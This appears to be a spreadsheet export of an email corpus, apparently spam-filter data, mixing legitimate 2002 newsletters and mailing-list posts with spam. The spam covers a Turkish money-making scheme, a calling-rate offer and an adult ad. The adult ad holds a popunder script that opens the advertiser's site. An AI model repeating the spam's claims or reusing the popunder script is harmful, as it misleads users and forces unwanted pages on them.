 sans-serif"&gt;&lt;font size="2"&gt;Sound crazy? Perhaps.  With 
 advertising,&lt;span lang="en-US"&gt; online &lt;/span&gt;and off,  taking it on the chin
 for the past two years,  online content sites have been shutting down,  laying
 off staff and pulling back on their offerings.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;However,  this horrible environment
 has resulted in an undeniable trend:  content businesses are challenging
 people to pay for content.  Finally,  after five years of free,  people are&lt;span
  lang="en-US"&gt; beginning &lt;/span&gt;to understand that online,  as in the real
 world,  you get what you pay for and they are taking out their credit cards.
  U.S.  consumers spent $675 million&amp;nbsp;on paid&amp;nbsp;online content last
 year,  a 92 percent increase over 2000 spending levels,  according to Online
 Publishers Association,  and that figure is expected to increase exponentially
 this year.  Look at these success stories:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;ul&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;New York Times Digital has 
 been steadily increasing its paid content services over the last year,  and 
 registered a 16 percent increase in its total revenues for the latest quarter.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;TheStreet.com brought over 
 $3 million in subscriptions last quarter,  an increase of almost 50 percent 
 over the year-ago quarter.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;ConsumerReports.com will 
 reach over a million paying subscribers by the end of this year.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;RealNetworks' consumer multi-media 
 subscription service has more than 750,000 subscribers,  bringing in $17.8 
 million in the last quarter.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;The Wall Street Journal Online
 added over 6,000 new paying customers last quarter,  bringing its subscriber
 base to 646,000.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;FT.com has signed up 17,000 
 subscribers in three months since it launched its premium site in May.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font size="2"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;In recognition of this trend we're hosting 
 the third installation of our innovative &lt;a class=""
  href="http://www.cmsummit.com"&gt;Content Management Summit on October 10, 
 2002&lt;/a&gt;.  The event charts the changes in the content industry from free 
 to paid subscription services,  and the technologies that are&lt;span
  lang="en-US"&gt; enabling &lt;/span&gt;the management and monetizing of content.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;Our previous Content Management 
 Summit (aka Digital Rights Summit) on October 18 last year in New York City 
 and January 29 in Los Angeles were unqualified successes.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;The Content Management Summit 
 III,  taking place in New York at the Millennium Broadway on October 10, 
 2002,  will bring together the 100 executives from the leading content and 
 distribution firms for a focused day of networking and discovering practical 
 solutions.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;The event will feature presentations 
 from software and services&lt;span lang="en-US"&gt; companies &lt;/span&gt;providing services
 and solutions for selling,  distributing,  managing,  and protecting content.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font size="2"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;We're&lt;span lang="en-US"&gt; thrilled &lt;/span&gt;that 
 Microsoft,  TeleKnowledge,  eMeta,  and Liquify will all be demonstrating 
 their latest products and services.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font size="2"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;The event will also feature six intimate&lt;span
  lang="en-US"&gt; round tables &lt;/span&gt;focusing on various aspects of online content.
  These panels are meant to provide an informal forum to discuss the challenges
 facing these specific vertical markets,  the changes in the sectors since
 the dot-com downfall,  and best practices in the industry.  The panels will
 feature leading practitioners in each sector,  and will also include an interactive
 question and answer session with the audience.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;Among the&lt;span
  lang="en-US"&gt; round table &lt;/span&gt;topics will be:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;ul&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font size="2"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;Weblogs:  how they are affecting big media 
 companies,  editorially as well as in content delivery/production mechanisms.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;Financial news and information 
 companies:  how they are using technologies to deliver content to users, 
 and how the economics have changed since the stock market downfall.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;Business information services 
 such as Hoovers,  Lexis-Nexis and others:  best practices in the industry, 
  niche product launches and revenue streams.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;Daily news/newspaper companies 
 publishing online:  how speed dictates technology choices,  and the move towards
 paid content and its implications,  among other issues.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
    &lt;li&gt;      
     &lt;div style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;Consumer and entertainment 
 publishers:  how do publishers determine the value of entertainment content, 
  the push towards paid subscriptions,  online advertising and other issues.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
   &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;Join us on October 10&lt;sup&gt;th&lt;/sup&gt; 
 for this very important event.  If you are directly&lt;span lang="en-US"&gt; responsible 
 &lt;/span&gt;for content management at a major content site you may qualify for 
 a VIP ticket.  Please e-mail your request with your name,  title and bio to
 &lt;a href="mailto:invite@cmsummit.com"&gt;invite@cmsummit.com&lt;/a&gt;.  If you are
 with a software or services provider,  or anyone not directly responsible 
 for the purchase of content management software or solutions,  you can purchase 
 a ticket to this event for $1,200 at &lt;a
  href="mailto:invite@cmsummit.com"&gt;invite@cmsummit.com&lt;/a&gt;.  &lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;Best Regards,&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;Jason McCabe Calacanis&lt;br&gt;
   E&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;ditor-in-Chief 
 &amp;amp;  CEO,  &lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana, 
 sans-serif"&gt;&lt;font
  size="2"&gt;Venture Reporter &amp;amp;  Silicon Alley Reporter &lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;hr width="100%" size="2"&gt;           
 &lt;p class="body"&gt;&lt;small&gt;&lt;font face="Helvetica, Arial, sans-serif"&gt;This email
  is being   sent to zzzz@jmason.org. &lt;/font&gt;&lt;/small&gt;&lt;/p&gt;
 &lt;p class="body"&gt;&lt;small&gt;&lt;font face="Helvetica, Arial, sans-serif"&gt;If you would
  rather   not receive  these infrequent updates simply click &lt;a
  href="http://venturereporter.net/myaccount/k.asp?E=zzzz@jmason.org"&gt;    
   here&lt;/a&gt;        and you will be removed instantly. &lt;/font&gt;&lt;/small&gt;&lt;/p&gt;
  &lt;small&gt;&lt;font face="Helvetica, Arial, sans-serif"&gt;You can also click   the
  link here or cut and paste it into your browser:&lt;br&gt;
  &lt;a href="http://venturereporter.net/myaccount/k.asp?E=zzzz@jmason.org"&gt; http://venturereporter.net/myaccount/k.asp?E=jm@jmason.org&lt;/a&gt; 
       &amp;nbsp;&lt;/font&gt;&lt;/small&gt; 
 &lt;p class="body"&gt;&lt;small&gt;&lt;font face="Helvetica, Arial, sans-serif"&gt;&lt;br&gt;
      &lt;/font&gt;&lt;/small&gt;&lt;/p&gt;
 &lt;div align="center"&gt;&lt;small&gt;&lt;font face="Helvetica, Arial, sans-serif"&gt; Venture 
      Reporter &lt;/font&gt;&lt;/small&gt;&lt;br&gt;
      &lt;/div&gt;
 &lt;div align="center"&gt;&lt;small&gt;&lt;font face="Helvetica, Arial, sans-serif"&gt; 307 
 West 36th Street, 10th Floor&lt;/font&gt;&lt;/small&gt;&lt;small&gt;&lt;br&gt;
      &lt;/small&gt;&lt;small&gt;&lt;font face="Helvetica, Arial, sans-serif"&gt;New York, New 
  York      10018&lt;/font&gt;&lt;/small&gt;&lt;small&gt;&lt;br&gt;
      &lt;/small&gt;&lt;small&gt;&lt;font face="Helvetica, Arial, sans-serif"&gt;Phoe: 646.473.2222&lt;/font&gt;&lt;/small&gt;&lt;/div&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;br&gt;
  &lt;font class="body"&gt;&lt;br&gt;
  &lt;/font&gt;&lt;/p&gt;
  &lt;br&gt;
  &lt;br&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Alvie wrote :
 &gt; This is only the last part of it.I used 'rpmbuild --rebuild --without
 &gt; avifile transcode.0.6.1-fr2.src.rpm'.
 &gt; af6_decore.cpp:305: 'WAVEFORMATEX'
 &gt; is used as a type, but is not defined as a
 &gt;    type.
 &gt; af6_decore.cpp:306: parse error before `if'
 [...]
 All of these "af6" are related to avifile6 support :-/
 Normally, my 0.6.1-fr2 build of transcode defaults to *not* use avifile,
 but you can use "--with avifile6" to force recompiling against it.
 Do you have an old avifile installed maybe?
 Can you check the "./configure ..." line run at the beginning of the
 rebuild process to see if it does include the "--without-avifile6" option?
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.23 0.14 0.14
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-06
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Perl "Meetup"
     posted by ziggy on Thursday September 05, @19:12 (news)
     http://use.perl.org/article.pl?sid=02/09/05/2316234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</si>
  <si>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Perl programmers are so cute
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/05.html#perl_programmers_are_so_cute
 Date: 2002-10-05T21:33:22-05:00
 _Ian Hickson_: #include web-log.txt[1]. &amp;#8220;I used some of Perl's niftier 
 features, such as using method lookup instead of a switch statement for the 
 preprocessing instruction dispatching, and exceptions instead of passing error 
 codes back and forth.&amp;#8221; He he. Perl programmers are so cute when they 
 imitate Python programmers.
 [1] http://ln.hixie.ch/?start=1033841933&amp;count=1
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Internet ve Para 
</t>
  </si>
  <si>
    <t xml:space="preserve">CashIC.com =DDnternetten para kazandiran, en onemlisi Turkiye ye de odeme=
  yapan bir sponsor. Uye olmak icin internetsitenizin olmas=FD da gerekmiy=
 or, herkes uye olup para kazanabilir.
 Uye olduktan sonra 6 degisik sek=FDlde para kazanmaya basliyor ve her ay =
 basinda ne kadar kazandiysaniz odemezi 10 gun =FDc=FDnde cek olarak aliyo=
 rsunuz! Internetten para kazanmak istiyenler icin kacirilmamasi gereken b=
 ir firsat!!!
 Attaki linke t=FDkladiktan sonra acilan sayfadan "Join Now" yazan yere ti=
 klayip acilan formu doldurun &amp; Kazanmaya baslayin !!!!
 Click here:  http://www.clickXchange.com/er.phtml?act=3D153133.60
 -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</si>
  <si>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International calls for only 33 cents per minute with no subscription
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear User,
 Do you ever wish you could easily call people you know in other countries
 for up to 85% less than standard call prices?! And then to make these savings
 without having to subscribe to any low cost calling service?! We have now
 launched a product that does exactly that!
 You can now call people in most popular destinations around the world for
 only 33 cents per minute! There are no hidden charges, you do not need to
 signup, use any credit cards, or pay any extra bills! You can try this
 service at no risk and choose to use it with no commitment!
 To use this new service, simply dial our access number 1530 927 055 and
 once connected, dial the actual international number you wish to call.
 For more information and the current list of countries you can call, 
 please check our website http://www.ireland.pd-dial.com/
 Example: If you wanted to call a German number 0567 123 124 you would:
 1) Dial 1 530 927 055
 2) Wait until you connect to our system and hear a message asking you
    to dial the number you wish to call.
 3) Dial the full international number starting 00. In this instance 00
    (for international) 49 (country code for Germany) 567 123 124 (their
    number without the initial zero)
 You will only pay 33 cents per minute to access our system with no further
 charges for any calls you make! You can also use this service to make
 cheap international calls from mobiles too! However please check the
 costs of calling 1530 numbers from your mobile if you are unsure.
 You only ever pay for the cost of calling our access number which will
 appear on your normal bill. However any international calls you make will
 not appear on your bill, so you only ever pay 33 cents per minute when
 using our service!
 If calling from a mobile, please ensure that you do not press the green/send
 key again after dialling the actual mobile number, or you will be billed
 for a second call by your mobile operator.
 If you have any questions or wish to contact us for more information, 
 please check our website http://www.ireland.pd-dial.com/ for details.
 If you are not interested in reducing your phone bills and would not like to
 be informed of any other similar offers from ourselves, please reply to this
 message with the word UNSUBSCRIBE in the subject heading. If you have your
 email forwarded, please ensure that you unsubscribe from the actual account
 email is sent to. We apologise if this message has inconvenienced you in any
 way.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Tech Specialist]  Geothermal Caffeine
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020711.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020711.html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&lt;/style&gt;&lt;title&gt;20020711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07.11.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;A HREF="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;&lt;img src="http://www.lockergnome.com/lgstore/sunshop/images/productpics/computerbasics.jpg" alt="TechTV's Computer Basics" height="109" width="63" border="2" hspace="10" align="left"&gt;&lt;/a&gt;
 &lt;b&gt;CHRIS TEACHES THE BASICS:&lt;/b&gt; If you've got friends or family who want to learn more about their PC, from a guy who makes things nice and easy, check out the VHS release of &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;Computer Basics&lt;/a&gt; in the GnomeStore. Chris teams with TechTV cohort, Kate Botello, to lead novices on a journey through their computer. From basic interactions, to installing apps, to using the Internet and e-mail, Chris and Kate have all the basics covered. Help out a friend and  &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;get them a copy&lt;/a&gt; today.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Wednesday's trip went fairly smooth overall, and I actually 
 enjoyed helping out my friend Larry with some server 
 software installation and network configuration tasks. His 
 kids seemed impressed with the new ability to copy files 
 between the five different computers and have Internet 
 access at any of them. Ahh, yes... geeks in the making.
 &lt;p&gt;After that project was finished, I met up with Jake at a 
 nearby Starbucks to shoot the breeze and catch up on all 
 things Lockergnome. We email all the time, but it's nice to 
 have a face-to-face conversation for a change. He had just 
 finished establishing new phone service with Verizon, so he 
 has a fun new PalmOS-based phone to play with.
 &lt;p&gt;After the dose of caffeine, I headed up to Boone, Iowa to 
 hook up with my cousin Casey and his wife of two months, 
 Stephanie. Their new house is awesome, but disappointing, as 
 there was no high-speed Internet connection or wireless 
 networking. We'll have to fix that. For now, I'll remain 
 impressed with the geothermal heating/cooling system and the 
 vast potential of the unfinished basement that will someday 
 make an incredible rec room [insert suitable Tim Allen grunt 
 here]. 
 &lt;p&gt;Casey is ticked about all of the rain recently because it 
 keeps eroding his dirt front yard into the drainage ditch. 
 The back yard is in great shape, as there was sod laid after 
 construction finished up, but he decided to save a few bucks 
 and seed the front himself next spring. This now assumes 
 that he'll have a front yard left by then.
 &lt;p&gt;The rain turned out to be the last event of the evening. 
 I drove through the beginning of the storms on the way from 
 Ankeny to Boone, and I just knew it was going to be a rough 
 drive home later since they were only getting started at 
 that time. I was correct. What would normally be an hour and 
 45 minute drive turned into nearly two and a half hours and 
 many, many animal sightings. As the night wore on, I was 
 half expecting to see someone building an ark in a 
 cornfield. Must have been where the animals were headed.
 &lt;p&gt;The rain guage at home showed 3.25" this morning, adding 
 to the 1.25" and 2.5" amounts dumped out of it within the 
 last week. I considered setting the sprinkler up in the 
 front yard today as an attempt at neighborly humor, but 
 figured I'd just be labeled as a complete moron instead. 
 &lt;p&gt;So, what did I forget to take with me, you ask? 
 Directions to Larry's house. DOH! I had to dig out the 
 notebook at a close rest area in a vain attempt to quickly 
 memorize the route. Instead, I decided to transcribe the 
 list on my Jornada, which would be far easier (and safer) to 
 read as I navigated through the streets. There's still a use 
 for printers in this world, without question. Reading text 
 from the tiny screen bites. Larger print and bold text on a 
 sheet of paper is the way to go. At least I didn't leave my 
 PDA at home as well, which I actually considered doing.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&lt;b&gt;Satellite Internet Delays Add Up&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.skycasters.com/supervpnwhitepaper.htm"&gt;http://www.skycasters.com/supervpnwhitepaper.htm&lt;/a&gt;
 &lt;p&gt;Have you considered moving to a satellite Internet 
 provider at some point? While all of the marketing hype 
 paints a rosy picture, there are a couple of things that you 
 really must consider before writing the check. The birds are 
 some 23,000 miles above the surface of the planet, so there 
 is a significant delay while the bits float up and back 
 down. The absolute minimum time for a packet to get from one 
 place to another is nearly a quarter of a second. Add in 
 hops across the Internet and other hardware latency and it's 
 common to see ping times of between 500 and 1000 
 milliseconds - an eternity when you're talking about TCP/IP 
 connections. Now consider how VPN connections are affected, 
 being that they are generally significantly slower on the 
 ground without the extra 46,000 miles. Ouch! This white 
 paper is a tad marketing driven, but I think their 
 explanation of technology and how they are addressing VPN-
 over-satellite connections is quite informative.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;PGP Outlook Plug-in Vulnerability&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.nai.com/naicommon/download/upgrade/patches/patch-pgphotfix.asp"&gt;http://www.nai.com/naicommon/download/upgrade/patches/patch-pgphotfix.asp&lt;/a&gt;
 &lt;p&gt;Even encryption software is potentially exposed to 
 security problems. Network Associates' PGP software, which 
 interfaces directly with Microsoft Outlook, has been found 
 to be vulnerable to malicious code within an email. Exposed 
 systems can be made to execute code of the attacker's 
 choice, and because email can be sent from anywhere and to 
 anywhere. Tracking down the source could be rather 
 difficult. Hotfixes for each of NAI's products are available 
 on their website.
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q311885"&gt;Q311885 - TAPI Error 0x8000022 Occurs with an English (Canada) or French (Canada) System Locale (Q311885)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q311842"&gt;Q311842 - Help and Support May Stop Responding When You Use the Network Diagnostic Tool (Q311842)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q311838"&gt;Q311838 - An OpenGL Program May Cause an Access Violation in Windows XP 64-Bit Edition (Q311838)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q311542"&gt;Q311542 - Devices May Not Power Up Properly When Resuming From Standby (Q311542)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q311345"&gt;Q311345 - Long Delay with No Prompt Between the Time When You Click Finish and When the Desktop Loads (Q311345)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;GET WINDOWS XP TIPS:&lt;/b&gt; Months after the release of Windows XP Professional and Home editions, people are still learning the nuances of Microsoft's newest operating system. Whether you've been using it for a while or are planning to upgrade to the new OS soon, this ebook is right up your alley. 
 &lt;a href="   http://store.eSellerate.net/s.asp?s=STR550611850&amp;Cmd=BUY&amp;SKURefnum=SKU3000768669&amp;AFFIDC=AFF669529939"&gt;GET YOUR COPY&lt;/a&gt; 
 of Lockergnome's Top 50 Windows XP tips now!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;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&lt;b&gt;Intro to Relational Databases&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.15seconds.com/issue/020522.htm"&gt;http://www.15seconds.com/issue/020522.htm&lt;/a&gt;
 &lt;p&gt;You know what a database is, right? Sure you do. Can you 
 explain what a relational database is all about? Correctly? 
 There's a lot more to database management and development 
 than dumping a bunch of records into tables and generating 
 reports. Proper design is crucial. Trust me. I've been on 
 the receiving end of some lazy programming efforts that 
 ignore the foundation of relational databases, and it 
 usually results in additional work later.
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Smile While You Surf&lt;/b&gt;
 &lt;p&gt;I like creative use of 404 pages, so sue me. Some of you have complained about the one Chris created for display when you come across a bogus link on the Lockergnome web site, which I don't understand. Would you rather stare at that stupid-looking, uninformative and generally useless one that your browser provides by default? 
 &lt;p&gt;Cramsession.com posted some unique "excuses" for their site being down for maintenance, and I thought I'd share a few:
 &lt;ul&gt;&lt;li&gt;&lt;p&gt;Roses are red
 &lt;br&gt;Our web site is resting
 &lt;br&gt;We're fixing the server
 &lt;br&gt;While Everquesting
 &lt;li&gt;In the interest of research, we're testing to see how long it takes a Network Administrator to get through a people-size maze to the web servers. As soon as he finds them, we'll be back online... Unless the Marketing Minotaur gets him first.
 &lt;li&gt;Suicide note found on the web server: "I've had it. I can't take the heat anymore. You ran me ragged, and what thanks did I get? None. Null. Nothing. I gave and I gave, and you still wanted more I spent every second of my day trying to make you happy, but it was never enough. Always work faster, do more, stay late, work overtime, be more efficient. I was never good enough for you anyway. You deserve better. Signed CPU." 
 &lt;li&gt;You have reached the Cramsession Maintenance Page.
 While you are staring at this page, waiting for the website to come back up, (should take about an hour or two) We'd like to offer the following fun activities:
 &lt;ol&gt;&lt;li&gt;Hold your breath until you see black spots dancing in front of your eyes.
 &lt;br&gt;&lt;li&gt;Spin around in your chair until you get nauseous. Wheee!
 &lt;br&gt;&lt;li&gt;Pretend your mouse is a microphone. Dictate a memo into it where you outline your plans for global domination.
 &lt;li&gt;Connect the dots!
 &lt;br&gt;.&amp;nbsp;&amp;nbsp;&amp;nbsp;.&amp;nbsp;&amp;nbsp;&amp;nbsp;.&amp;nbsp;&amp;nbsp;&amp;nbsp;.&amp;nbsp;&amp;nbsp;&amp;nbsp;.&amp;nbsp;&amp;nbsp;&amp;nbsp;.&amp;nbsp;&amp;nbsp;&amp;nbsp;.
 &lt;li&gt;Get monitor cleaner so you can wipe ink off of screen from connecting the dots.&lt;/ol&gt; 
 &lt;li&gt;We apologise for the inconvenience of our missing web site. We're doing something really "high tech" and "important" behind this "maintenance" curtain. We'll be back just as soon as we catch all the gophers.....Again.
 &lt;li&gt;HELP! I'm locked in the Server Room. Please send Help! And I'm running out of potato chips, too!&lt;/ul&gt;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href="http://www.lockergnome.com/issues/techspecialist/20020711.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020711.html&lt;/a&gt;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</si>
  <si>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Adult Passwords Here
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_1493_212580644306344345450286
 Content-Type: text/plain;
 	charset=iso-8859-1
 Content-Transfer-Encoding: Quoted-Printable
 **** CELEBRITIES EXPOSED  ****
 Jennifer Love Huitt Gets BareNaked! 
 J-LO Takes Some "Puffy"  
 No Credit Cards, No Checks 
 IT'S FREE!  
 http://www.free-celebhardcore.com/10391
 ------=_NextPart_1493_212580644306344345450286
 Content-Type: text/html;
 	charset=iso-8859-1
 Content-Transfer-Encoding: Quoted-Printable
 &lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;
 &lt;html&gt;
 &lt;head&gt;
    &lt;meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; U) =
 [Netscape]"&gt;
    &lt;title&gt;ad2&lt;/title&gt;
 &lt;script&gt;
 win=3Dwindow.open("http://www.free-celebhardcore.com/10391")
 win.blur()
 window.focus()
 &lt;/script&gt;
 &lt;/head&gt;
 &lt;body text=3D"#000000" bgcolor=3D"#33CCFF" link=3D"#0000EE" vlink=3D"#551A8B" =
 alink=3D"#FF0000"&gt;
 &lt;center&gt;&lt;table BORDER CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"600" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;center&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#FF0000"&gt;&lt;font =
 size=3D+4&gt;CELEBRITIES
